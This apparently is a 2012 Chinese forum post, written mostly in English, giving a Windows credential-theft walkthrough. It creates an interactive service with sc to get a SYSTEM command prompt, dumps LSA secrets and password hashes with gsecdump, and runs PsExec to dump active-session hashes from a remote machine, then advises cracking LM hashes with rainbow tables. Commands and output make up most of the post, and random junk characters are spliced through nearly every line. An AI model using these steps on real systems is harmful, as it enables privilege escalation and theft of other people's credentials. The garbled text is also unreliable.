标题: HASH注入式攻击 [打印本页] 作者: admin 时间: 2012-11-6 21:09 标题: HASH注入式攻击 o get a DOS Prompt as NT system: & V1 @6 P3 k' Y4 U$ h0 m; L5 S9 k6 O" X/ f
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact; Z% o7 C5 d1 W5 L
[SC] CreateService SUCCESS1 }7 ~7 |1 G4 c4 ?2 m4 N& F# {$ B
0 ^6 O$ l6 C" W2 L3 O4 d3 ?- D8 r: {C:\>sc start shellcmdline 6 L$ A* }: z) ][SC] StartService FAILED 1053:0 t. r# }% _8 B: q8 y7 Q4 ?* W" n* U
2 u3 `7 G, M+ a2 H$ d2 f- F% ]7 P
The service did not respond to the start or control request in a timely fashion. k1 E; d2 f. h
+ M# j2 A- Z9 j; S- g------------* |$ N3 [( a( s8 ~
, ]# r. f. @* R& l3 c
Then in the new DOS window:) ]( I, l4 I' e3 Q, O; e. V
6 \* o0 V. V% V: z
Microsoft Windows XP [Version 5.1.2600] - v( a( x- }& q4 k! U) o& V5 w$ G(C) Copyright 1985-2001 Microsoft Corp.( D; @& Y. K" V( Z$ e; U
' M: l% |/ Y# d( A4 }
C:\WINDOWS\system32>whoami 7 F" a0 L% U( n# G" T: E* y7 CNT AUTHORITY\SYSTEM 8 _0 k# r) I6 f" w 9 C7 l& }* [% A- n# wC:\WINDOWS\system32>gsecdump -h $ N2 v, w0 e4 |2 B, D7 J7 |1 igsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se) : I& p( W+ K$ P2 Lusage: gsecdump [options]: x4 d) W; c1 z7 k5 L3 U/ s
* y( O. ~* ^1 O* U; W' |options:8 l* _( `: C3 B
-h [ --help ] show help% ^, C7 m' }' X% u1 p. M
-a [ --dump_all ] dump all secrets ! V! ~1 u5 y5 Z% l2 U-l [ --dump_lsa ] dump lsa secrets% j& `' ^ O8 Y* N
-w [ --dump_wireless ] dump microsoft wireless connections" X/ n% j. s& d& ]( y: O6 D( R) _
-u [ --dump_usedhashes ] dump hashes from active logon sessions : h; f z4 Q; h+ Q-s [ --dump_hashes ] dump hashes from SAM/AD * F1 M5 F. H( u, f6 S0 U7 R4 S6 N) o0 f$ u1 Z; Q
Although I like to use:8 \9 U6 F5 A% O) \
& r. Q7 b/ Y9 C% I1 I% D: U- WPsExec v1.83 - Execute processes remotely ; \" l3 p6 ?3 m; p& l: MCopyright (C) 2001-2007 Mark Russinovich* i5 q) ~6 ]5 B1 m
Sysinternals - 链接标记[url]www.sysinternals.com[/url] 7 C! W- O1 K' g/ r8 G9 e- Z; G2 `- T2 A+ |! P
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT 5 D( y' S6 J8 Y8 G* R; G- V0 H6 ?6 A3 @6 L3 L
to get the hashes from active logon sessions of a remote system. 3 L/ b7 X/ U$ F" z6 b% j 5 c. g& {6 ] Z/ d$ p* S( }- v* m; ] VThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.- i/ H" z! M$ W9 q# U7 }